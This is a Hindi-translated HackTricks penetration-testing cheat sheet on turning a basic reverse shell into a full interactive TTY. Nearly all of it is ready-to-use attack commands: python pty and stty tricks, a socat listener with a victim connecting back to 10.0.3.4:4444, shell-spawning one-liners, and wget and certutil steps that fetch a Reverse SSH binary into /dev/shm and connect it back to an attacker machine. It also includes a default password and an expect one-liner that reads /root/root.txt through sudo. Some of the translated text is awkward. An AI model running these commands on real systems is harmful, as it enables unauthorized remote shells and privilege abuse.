Full TTYs

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

पूर्ण TTY

ध्यान दें कि जिस शैल आप SHELL चर में सेट करते हैं, वह अवश्य /etc/shells के अंदर सूचीबद्ध होनी चाहिए या The value for the SHELL variable was not found in the /etc/shells file This incident has been reported। इसके अलावा, ध्यान दें कि अगले स्निपेट्स केवल बैश में काम करेंगे। यदि आप zsh में हैं, तो bash चलाकर शैल अर्जित करने से पहले बैश में बदलें।

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

आप stty -a को निष्पादित करके पंक्तियों और स्तंभों की संख्या प्राप्त कर सकते हैं।

स्क्रिप्ट

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

सोकैट

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

शैल्स उत्पन्न करें

  • python -c 'import pty; pty.spawn("/bin/sh")'

  • echo os.system('/bin/bash')

  • /bin/sh -i

  • script -qc /bin/bash /dev/null

  • perl -e 'exec "/bin/sh";'

  • perl: exec "/bin/sh";

  • ruby: exec "/bin/sh"

  • lua: os.execute('/bin/sh')

  • IRB: exec "/bin/sh"

  • vi: :!bash

  • vi: :set shell=/bin/bash:shell

  • nmap: !sh

रिवर्स एसएसएच

इंटरैक्टिव शैल एक्सेस, साथ ही फ़ाइल ट्रांसफ़र और पोर्ट फ़ॉरवर्डिंग के लिए एक सुविधाजनक तरीका है, लक्षित को ड्रॉप करना स्थिर लिंक्ड एसएसएच सर्वर रिवर्स एसएसएच टारगेट पर।

नीचे एक उदाहरण है x86 के लिए उपक्षिप्त बाइनरी के साथ। अन्य बाइनरी के लिए, देखें रिलीज पेज

  1. एसएसएच पोर्ट फॉरवर्डिंग अनुरोध पकड़ने के लिए स्थानीय रूप से तैयारी करें:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444
  • (2a) लिनक्स लक्ष्य:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2
  • यदि ReverseSSH पोर्ट फॉरवर्डिंग अनुरोध सफल रहा है, तो अब आपको reverse-ssh(.exe) चलाने वाले उपयोगकर्ता के संदर्भ में डिफ़ॉल्ट पासवर्ड letmeinbrudipls के साथ लॉग इन करने में सक्षम होना चाहिए:

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

कोई TTY नहीं

यदि किसी कारणवश आपको एक पूर्ण TTY प्राप्त नहीं हो सकता है, तो भी आप प्रोग्रामों के साथ बातचीत कर सकते हैं जो उपयोगकर्ता इनपुट की अपेक्षा करते हैं। निम्नलिखित उदाहरण में, पासवर्ड sudo को पास किया जाता है ताकि एक फ़ाइल पढ़ सके:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

Last updated